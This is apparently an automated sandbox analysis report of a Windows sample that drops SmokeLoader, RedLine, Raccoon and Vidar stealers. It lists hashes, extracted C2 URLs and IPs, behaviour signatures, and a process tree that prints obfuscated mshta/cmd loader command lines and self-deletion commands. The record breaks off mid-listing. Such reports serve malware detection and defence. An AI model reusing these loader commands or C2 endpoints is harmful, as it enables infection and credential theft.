Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
16-11-2021 16:48
Static task
static1
Behavioral task
behavioral1
Sample
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe
Resource
win10-en-20211014
General
-
Target
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe
-
Size
325KB
-
MD5
38769a47dde164c35275e7f3c54039ce
-
SHA1
940da3f145cb618a72f715a5a23a6c8041febb28
-
SHA256
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96
-
SHA512
35384e03d3ff3f0571acd7e39c5a8e37dcaffab4e19ffab8655844e03b46e906c46667957b19e21efbf58237bd1f3088a907fea76483216ce5fef79531742d45
Malware Config
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
redline
185.159.80.90:38637
Extracted
raccoon
1.8.3-hotfix
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
-
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
Extracted
vidar
48.5
706
https://koyu.space/@tttaj
-
profile_id
706
Extracted
redline
imbest
45.153.186.153:56675
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/360-144-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/360-145-0x0000000000418EEA-mapping.dmp family_redline behavioral1/memory/832-201-0x0000000004300000-0x000000000432D000-memory.dmp family_redline behavioral1/memory/832-208-0x00000000043C0000-0x00000000043EC000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3052-187-0x00000000043F0000-0x00000000044C5000-memory.dmp family_vidar behavioral1/memory/3052-188-0x0000000000400000-0x00000000027E5000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
Processes:
76A3.exe76A3.exe8CEB.exe9F3C.exe8CEB.exeE5FA.exe26C.exe8F5.exe16D1.exe1EB2.exeGEpth.eXeegfsuevpid process 376 76A3.exe 2316 76A3.exe 3608 8CEB.exe 3328 9F3C.exe 360 8CEB.exe 1712 E5FA.exe 1892 26C.exe 3052 8F5.exe 3800 16D1.exe 832 1EB2.exe 2820 GEpth.eXe 2640 egfsuev -
Deletes itself 1 IoCs
Processes:
pid process 3056 -
Loads dropped DLL 4 IoCs
Processes:
8F5.exeregsvr32.exepid process 3052 8F5.exe 3052 8F5.exe 4084 regsvr32.exe 4084 regsvr32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe76A3.exe8CEB.exedescription pid process target process PID 2452 set thread context of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 376 set thread context of 2316 376 76A3.exe 76A3.exe PID 3608 set thread context of 360 3608 8CEB.exe 8CEB.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2208 1892 WerFault.exe 26C.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
egfsuev2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe76A3.exe9F3C.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI egfsuev Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 76A3.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 76A3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI egfsuev Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI egfsuev Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 76A3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9F3C.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9F3C.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 9F3C.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
8F5.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 8F5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 8F5.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2232 timeout.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3996 taskkill.exe 3188 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exepid process 724 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 724 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 3056 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3056 -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe76A3.exe9F3C.exeegfsuevpid process 724 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2316 76A3.exe 3328 9F3C.exe 3056 3056 3056 3056 2640 egfsuev -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WerFault.exe8CEB.exe1EB2.exetaskkill.exetaskkill.exedescription pid process Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeRestorePrivilege 2208 WerFault.exe Token: SeBackupPrivilege 2208 WerFault.exe Token: SeDebugPrivilege 360 8CEB.exe Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeDebugPrivilege 2208 WerFault.exe Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeDebugPrivilege 832 1EB2.exe Token: SeDebugPrivilege 3996 taskkill.exe Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeDebugPrivilege 3188 taskkill.exe Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 Token: SeCreatePagefilePrivilege 3056 Token: SeShutdownPrivilege 3056 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe76A3.exe8CEB.exe16D1.execmd.exeGEpth.eXemshta.exedescription pid process target process PID 2452 wrote to memory of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 2452 wrote to memory of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 2452 wrote to memory of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 2452 wrote to memory of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 2452 wrote to memory of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 2452 wrote to memory of 724 2452 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe 2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe PID 3056 wrote to memory of 376 3056 76A3.exe PID 3056 wrote to memory of 376 3056 76A3.exe PID 3056 wrote to memory of 376 3056 76A3.exe PID 376 wrote to memory of 2316 376 76A3.exe 76A3.exe PID 376 wrote to memory of 2316 376 76A3.exe 76A3.exe PID 376 wrote to memory of 2316 376 76A3.exe 76A3.exe PID 376 wrote to memory of 2316 376 76A3.exe 76A3.exe PID 376 wrote to memory of 2316 376 76A3.exe 76A3.exe PID 376 wrote to memory of 2316 376 76A3.exe 76A3.exe PID 3056 wrote to memory of 3608 3056 8CEB.exe PID 3056 wrote to memory of 3608 3056 8CEB.exe PID 3056 wrote to memory of 3608 3056 8CEB.exe PID 3056 wrote to memory of 3328 3056 9F3C.exe PID 3056 wrote to memory of 3328 3056 9F3C.exe PID 3056 wrote to memory of 3328 3056 9F3C.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3608 wrote to memory of 360 3608 8CEB.exe 8CEB.exe PID 3056 wrote to memory of 1712 3056 E5FA.exe PID 3056 wrote to memory of 1712 3056 E5FA.exe PID 3056 wrote to memory of 1712 3056 E5FA.exe PID 3056 wrote to memory of 1892 3056 26C.exe PID 3056 wrote to memory of 1892 3056 26C.exe PID 3056 wrote to memory of 1892 3056 26C.exe PID 3056 wrote to memory of 3052 3056 8F5.exe PID 3056 wrote to memory of 3052 3056 8F5.exe PID 3056 wrote to memory of 3052 3056 8F5.exe PID 3056 wrote to memory of 3800 3056 16D1.exe PID 3056 wrote to memory of 3800 3056 16D1.exe PID 3056 wrote to memory of 3800 3056 16D1.exe PID 3056 wrote to memory of 832 3056 1EB2.exe PID 3056 wrote to memory of 832 3056 1EB2.exe PID 3056 wrote to memory of 832 3056 1EB2.exe PID 3056 wrote to memory of 1980 3056 explorer.exe PID 3056 wrote to memory of 1980 3056 explorer.exe PID 3056 wrote to memory of 1980 3056 explorer.exe PID 3056 wrote to memory of 1980 3056 explorer.exe PID 3056 wrote to memory of 1260 3056 explorer.exe PID 3056 wrote to memory of 1260 3056 explorer.exe PID 3056 wrote to memory of 1260 3056 explorer.exe PID 3800 wrote to memory of 1104 3800 16D1.exe mshta.exe PID 3800 wrote to memory of 1104 3800 16D1.exe mshta.exe PID 3800 wrote to memory of 1104 3800 16D1.exe mshta.exe PID 868 wrote to memory of 2820 868 cmd.exe GEpth.eXe PID 868 wrote to memory of 2820 868 cmd.exe GEpth.eXe PID 868 wrote to memory of 2820 868 cmd.exe GEpth.eXe PID 868 wrote to memory of 3996 868 cmd.exe taskkill.exe PID 868 wrote to memory of 3996 868 cmd.exe taskkill.exe PID 868 wrote to memory of 3996 868 cmd.exe taskkill.exe PID 2820 wrote to memory of 1116 2820 GEpth.eXe mshta.exe PID 2820 wrote to memory of 1116 2820 GEpth.eXe mshta.exe PID 2820 wrote to memory of 1116 2820 GEpth.eXe mshta.exe PID 1116 wrote to memory of 3064 1116 mshta.exe cmd.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe"C:\Users\Admin\AppData\Local\Temp\2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe"C:\Users\Admin\AppData\Local\Temp\2beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\76A3.exeC:\Users\Admin\AppData\Local\Temp\76A3.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\76A3.exeC:\Users\Admin\AppData\Local\Temp\76A3.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\8CEB.exeC:\Users\Admin\AppData\Local\Temp\8CEB.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8CEB.exeC:\Users\Admin\AppData\Local\Temp\8CEB.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\9F3C.exeC:\Users\Admin\AppData\Local\Temp\9F3C.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\E5FA.exeC:\Users\Admin\AppData\Local\Temp\E5FA.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\26C.exeC:\Users\Admin\AppData\Local\Temp\26C.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 4002⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\8F5.exeC:\Users\Admin\AppData\Local\Temp\8F5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8F5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8F5.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8F5.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\16D1.exeC:\Users\Admin\AppData\Local\Temp\16D1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScriPt: clOse( CrEateObjECT( "Wscript.SHELL"). RUn ("CmD.EXe /Q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\16D1.exe"" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF """" == """" for %z in (""C:\Users\Admin\AppData\Local\Temp\16D1.exe"") do taskkill /IM ""%~nXz"" -F " , 0, true) )2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R TYpE "C:\Users\Admin\AppData\Local\Temp\16D1.exe" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF "" =="" for %z in ("C:\Users\Admin\AppData\Local\Temp\16D1.exe") do taskkill /IM "%~nXz" -F3⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\GEpth.eXe..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScriPt: clOse( CrEateObjECT( "Wscript.SHELL"). RUn ("CmD.EXe /Q /R TYpE ""C:\Users\Admin\AppData\Local\Temp\GEpth.eXe"" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF ""/PWvkDiYa1vO4kkeo6dmUXtDkxgvu "" == """" for %z in (""C:\Users\Admin\AppData\Local\Temp\GEpth.eXe"") do taskkill /IM ""%~nXz"" -F " , 0, true) )5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R TYpE "C:\Users\Admin\AppData\Local\Temp\GEpth.eXe" > ..\GEpth.eXe && sTaRT ..\GEpTH.eXE /PWvkDiYa1vO4kkeo6dmUXtDkxgvu &IF "/PWvkDiYa1vO4kkeo6dmUXtDkxgvu " =="" for %z in ("C:\Users\Admin\AppData\Local\Temp\GEpth.eXe") do taskkill /IM "%~nXz" -F6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscRipt: clOse ( CrEAteoBJEcT ( "wSCRipT.shEll" ). rUn ( "cMD /r Echo | sET /P = ""MZ"" > b_YXEl0G._J & CoPY /Y /B b_YXEL0G._J+ VJM7A_.O + RTKwu.VjJ ..\F3Os.H & del /q *& staRt regsvr32 -u /s ..\f3OS.H " ,0 , trUE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r Echo | sET /P = "MZ" > b_YXEl0G._J & CoPY /Y /B b_YXEL0G._J+ VJM7A_.O + RTKwu.VjJ ..\F3Os.H & del /q *& staRt regsvr32 -u /s ..\f3OS.H6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>b_YXEl0G._J"7⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -u /s ..\f3OS.H7⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "16D1.exe" -F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1EB2.exeC:\Users\Admin\AppData\Local\Temp\1EB2.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
-
C:\Users\Admin\AppData\Roaming\egfsuevC:\Users\Admin\AppData\Roaming\egfsuev1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\freebl3.dllMD5
ef2834ac4ee7d6724f255beaf527e635
SHA15be8c1e73a21b49f353c2ecfa4108e43a883cb7b
SHA256a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba
SHA512c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2
-
C:\ProgramData\mozglue.dllMD5
8f73c08a9660691143661bf7332c3c27
SHA137fa65dd737c50fda710fdbde89e51374d0c204a
SHA2563fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA5120042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89
-
C:\ProgramData\msvcp140.dllMD5
109f0f02fd37c84bfc7508d4227d7ed5
SHA1ef7420141bb15ac334d3964082361a460bfdb975
SHA256334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA51246eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39
-
C:\ProgramData\nss3.dllMD5
bfac4e3c5908856ba17d41edcd455a51
SHA18eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA5122565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66
-
C:\ProgramData\softokn3.dllMD5
a2ee53de9167bf0d6c019303b7ca84e5
SHA12a3c737fa1157e8483815e98b666408a18c0db42
SHA25643536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083
SHA51245b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8
-
C:\ProgramData\vcruntime140.dllMD5
7587bf9cb4147022cd5681b015183046
SHA1f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA5120b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\8CEB.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\16D1.exeMD5
d8a81f4f7e64f2e5f3c4bef85c23931b
SHA16df6b63f7c717945d57ac8e9189efb1c42aa6a24
SHA256361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd
SHA51298d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5
-
C:\Users\Admin\AppData\Local\Temp\16D1.exeMD5
d8a81f4f7e64f2e5f3c4bef85c23931b
SHA16df6b63f7c717945d57ac8e9189efb1c42aa6a24
SHA256361cd0082558c6df0e588cb71d77115f58d1880242a713e2bb74b02e19d6b4bd
SHA51298d196ed25be9d2f2471f8ef0a737f50705975ff93fc2451b588e89d9b4fe866352e8e5904b9140f1c7bcc7fcad8748c637253922caa091fb17ebcf08f8243f5
-
C:\Users\Admin\AppData\Local\Temp\1EB2.exeMD5
daeffa9ee5a90d60bad2a72b1810f728
SHA165f53c53544cac63ebed7af547f4704ca77211ee
SHA2561bd554b3c8d01435f5a315351419e0f13549a98be4617d938e38a6a4c852ac72
SHA512a6a6afc911732d9a687b7cafb57dc5816810382748f6831df246dd1d8a0466dcbac40b6ea30494e336d85a75d7155926d8abf13aed4b613a8203e4da95cad265
-
C:\Users\Admin\AppData\Local\Temp\1EB2.exeMD5
daeffa9ee5a90d60bad2a72b1810f728
SHA165f53c53544cac63ebed7af547f4704ca77211ee
SHA2561bd554b3c8d01435f5a315351419e0f13549a98be4617d938e38a6a4c852ac72
SHA512a6a6afc911732d9a687b7cafb57dc5816810382748f6831df246dd1d8a0466dcbac40b6ea30494e336d85a75d7155926d8abf13aed4b613a8203e4da95cad265
-
C:\Users\Admin\AppData\Local\Temp\26C.exeMD5
2ebec11a51c2253df97edbf23ffd2752
SHA1568aee30b634db6d3427b5b9af49ed9df7245a34
SHA256180ab0f8dbede535c1261873c0ec160e2f93482d3ab9c0e971b1041c9fd60516
SHA5121e98e32e2db370febd4c269f9e538d60f07ed8b7304e8e0253355b39729576cc09aafef8b7b5fbfb7f55e19707ce821a8481fc9a9749ebd45ca4d11da5f01883
-
C:\Users\Admin\AppData\Local\Temp\26C.exeMD5
2ebec11a51c2253df97edbf23ffd2752
SHA1568aee30b634db6d3427b5b9af49ed9df7245a34
SHA256180ab0f8dbede535c1261873c0ec160e2f93482d3ab9c0e971b1041c9fd60516
SHA5121e98e32e2db370febd4c269f9e538d60f07ed8b7304e8e0253355b39729576cc09aafef8b7b5fbfb7f55e19707ce821a8481fc9a9749ebd45ca4d11da5f01883
-
C:\Users\Admin\AppData\Local\Temp\76A3.exeMD5
38769a47dde164c35275e7f3c54039ce
SHA1940da3f145cb618a72f715a5a23a6c8041febb28
SHA2562beac8c979465806b1c3f9e2208ef7956b201b97368dce8293bc948f78c96e96
